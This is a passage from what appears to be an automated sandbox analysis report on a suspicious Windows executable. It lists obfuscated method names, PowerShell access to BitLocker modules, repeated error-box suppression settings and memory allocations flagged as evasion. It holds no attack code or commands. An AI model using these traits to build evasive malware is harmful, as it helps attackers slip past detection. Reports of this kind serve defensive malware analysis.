                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, tsKFQRyS8x1tRqYrqR.csHigh entropy of concatenated method names: 'p7sEkerBwW', 'I19EC4ZAkx', 'hOSE9falXf', 'rZyEuOvAyx', 'c8XEmIQILl', 'Fm1EM1kOKf', 'SfTEX4N8xn', 'VPUEB5EYtN', 'wTCELe0IkX', 'h7LEZCOBCV'
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, Rnlu3s8n8UKbY8UFJb.csHigh entropy of concatenated method names: 'pB2jh9voWO', 'hQejUt8O5j', 'eyfjYSEPGv', 's3hjxGwwZl', 'WK9jd1eB6H', 'eZXj4833YJ', 'pYHjVIj5Ht', 'JBIjk1bAGd', 'YJJjCNqWrc', 'AfCjAf9prE'
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, uvatpAIBg4sIxQSbeU.csHigh entropy of concatenated method names: 'YLmwL6nIF1', 'ThgwvYmiVE', 'DCewII4v9O', 'S6swcgD2wI', 'J66wugNMXv', 'GnvwOnh33g', 'tRZwmuRfoD', 'otVwMNrqDw', 'u7hwg5sWGy', 'rZswXW1jZ2'
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, geRufZzvwFwWKwr4Qj.csHigh entropy of concatenated method names: 'UUVG4t1bQd', 'hgDGkSgDwM', 'XXuGCiw1gc', 'kayG95e0ma', 'AOKGuglo1H', 'CddGm7oGc1', 'r5MGM2UIDL', 'ncdGrcR66p', 'QvRGhM6e39', 'ocaGUfcWtl'
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, XBqFKCC6Y5jjqc6xvG.csHigh entropy of concatenated method names: 'RmVKxAprnF', 'XdJK4Cf7jp', 'tGqKktiP7i', 'XMMKClaRQn', 'rU0Kw8Fe46', 'gK5K1t02Cr', 'mp8KQnVkT9', 'oCYKFJbdgi', 'iK4KqrrSMZ', 'v74KGNwL83'
                Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, nAVng69YPviXSp80Uh.csHigh entropy of concatenated method names: 'ILq6tWNH5v', 'JOu6RNiwBx', 'UqE6nomfis', 'qWr6jYLjao', 'jpF6b5lHHR', 'p27ne7RSUc', 'H9NnSgLs63', 'HipniOUEvZ', 'lAgnNDsbSH', 'dCUn0ULXuu'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: 3GrfjMY0pG.exe PID: 6956, type: MEMORYSTR
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeMemory allocated: 15C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeMemory allocated: 3390000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeMemory allocated: 30D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeMemory allocated: 8210000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeMemory allocated: 9210000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeMemory allocated: 93C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeMemory allocated: A3C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeMemory allocated: A720000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\3GrfjMY0pG.exeMemory allocated: B720000 memory reserve | memory write watchJump to behavior
